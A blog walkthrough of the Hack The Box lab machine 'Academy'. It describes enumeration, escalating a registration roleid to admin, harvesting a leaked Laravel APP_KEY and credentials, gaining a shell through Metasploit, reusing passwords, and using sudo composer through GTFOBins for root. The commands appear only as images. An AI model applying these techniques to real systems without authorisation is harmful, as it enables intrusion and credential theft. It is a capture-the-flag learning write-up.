tsustyle

Red Team Aspirant

Academy

2 minute read

Port Scanning and general enumeration (Nmap, FFuF)

img

Webserver and something to do with mysql on that high port. Let’s enumerate the webserver

Browsing using the url, gives us an error pointing to academy.htb. Adding the url and academy.htb to our hosts file fixes the error.

img

We have the ability to LOGIN and REGISTER. After registering and logging in we’re greeted with a home.php page that is seemingly the HTB Academy, but nothing works! Well, we know that the site is built on php so let’s toss a FFuF at it fuzzing for .php files

img

admin page??

img

Requires credentials that we don’t have.

Access (BurpSuite, metasploit)

Let’s go back and take a closer look at the registration process by capturing the request in BurpSuite

img

Interesting parameter. roleid? Let’s change that to 1 and send it off. What happens if we try to use this new account with the roleid of 1 to log into the admin section?

img

We’re in! Let’s add dev-staging-01.academy.htb to our hosts and navigate to it.

img

Error page, but lots of information here. Looks like database usernames and passwords. App name is Laravel and even the app key! I couldn’t find a version number for Laravel, but let’s see if metasploit has anything for us

img

Lookg good. Outside of the ordinary options it requires the APP_KEY (that base64 string we found earlier) and the VHOST which in our case is dev-staging-01.academy.htb

Let’s fire it off and get our shell.

Privesc (linPEAS, Composer)

Doing some manual enumeration on the box there are a couple things to note. First, there are six users with an interactivce shell.

img

And the .env file for htb-academy-dev-01, it had much of the same information from the error page we found earlier. But since it’s basically a staging branch of the site, what if the original academy site has an .env file too?

img

I wonder if any of those six users is the database dev? Maybe they reuse passwords?

Trying that password with each user until I found that the password works for the cry0l1t3 user

img

So now we’re cry0l1t3, what can we do?

img

Turns out, not a lot. Let’s run linPEAS and see if there are any privesc vectors we can use

img

Oh? Some horizontal movement? Well, mrb3n, what can you do?

img

Hey, this user can actually sudo. Checking GTFOBins we find

img

Follow the instructions and claim your prize!

img

You may also enjoy

Tenet

‘Tenet’ is a medium rated box on Hack the Box. We’ll be using PHP Object Injection to get RCE and identify a race condition in a custom script for privesc.

Skynet

‘Skynet’ is a box on TryHackMe. We’ll be enumerating SMB shares, brute forcing a login and exploiting a Remote File Inclusion vulnerability in Cuppa CMS for a foothold. For our root shell we’ll take a look at exploiting some wildcard injection using a script that’s being run as a cronjob.

FFuF Cheatsheet

This is a Cheatsheet I created for reference when using FFuF

Ready

‘Ready’ is a medium rated box on Hack the Box. We’ll be using a public exploit for a vulnerable Gitlab version for a shell, enumeration and password reuse for privesc and escape a docker container for root